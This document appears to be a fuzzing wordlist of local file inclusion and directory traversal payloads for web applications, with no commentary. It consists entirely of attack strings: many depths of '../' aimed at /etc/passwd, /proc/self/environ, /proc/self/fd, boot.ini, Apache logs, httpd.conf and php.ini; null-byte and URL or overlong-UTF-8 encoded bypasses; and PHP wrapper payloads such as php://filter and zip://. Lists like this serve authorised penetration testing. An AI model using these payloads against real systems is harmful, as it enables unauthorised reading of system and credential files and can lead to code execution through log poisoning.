../../../etc/passwd/././././././././/././././././././././
../../../etc/passwd%00
../../../proc/self/environ
zip://archive.zip%23payload.php
php://filter/convert.base64-encode/resource=../vulnerable.php
proc/self/environ
/proc/self/environ
/proc/self/cmdline
/proc/self/stat
/proc/self/status
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../../proc/self/environ
proc/self/environ%00
../../../../../../../../../../../../../../../../../../proc/self/environ%00
../proc/self/fd/8
../../../../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../../../../../../../proc/self/fd/8%00
../../../../../../../../../../../../../../../../../../proc/self/fd/8%0
/apache/logs/access.log
/apache/logs/error.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/usr/local/apache/logs/access_log
../../apache/logs/access.log
../../../apache/logs/access.log
../../../../apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/access_log
/var/log/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
../../../../../../logs/error_log
../../../../../../../logs/error_log
/usr/local/apache2/conf/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/apache/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/etc/php.ini
/bin/php.ini
/etc/httpd/php.ini
/usr/lib/php.ini
/usr/lib/php/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/cgi/php.ini
/php5\php.ini
/xampp\apache\bin\php.ini
/NetServer\bin\stable\apache\php.ini
/home2\bin\stable\apache\php.ini
/home\bin\stable\apache\php.ini
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
C:\wamp\logs\access.log
../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../../../../../../var/log/httpd-access.log%00
../../../../../../../../../../../../etc/security/user
/var/log/ftp-proxy/ftp-proxy.lo
/etc/ftpchroot
etc%2fpasswd
etc%2fpasswd%00
etc%5cpasswd
etc%5cpasswd%00
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fname
/.\\./.\\./.\\./.\\./.\\./.\\./boot.in
/..\../..\../..\../..\../..\../..\../boot.ini
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
c:\apache\logs\access.log
c:\apache\logs\error.log
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../etc/passwd&=%3C%3C%3C%3C
L21hc3Rlci5wYXNzd2Q=
../../../../../../..//etc/passwd
..........................................................................\..\/etc/passwd


